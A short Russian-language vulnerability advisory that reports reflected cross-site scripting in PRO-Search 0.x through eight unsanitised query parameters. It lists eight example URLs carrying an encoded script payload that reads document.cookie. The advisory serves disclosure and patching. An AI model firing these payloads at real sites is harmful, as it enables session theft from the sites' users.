Программа: PRO-Search 0.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "prot", "host", "path", "name", "ext", "size", "search_days" и "show_page". Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://site/?prot=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?host=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?path=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?name=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?ext=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?size=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?search_days=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

http://site/?show_page=%27%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии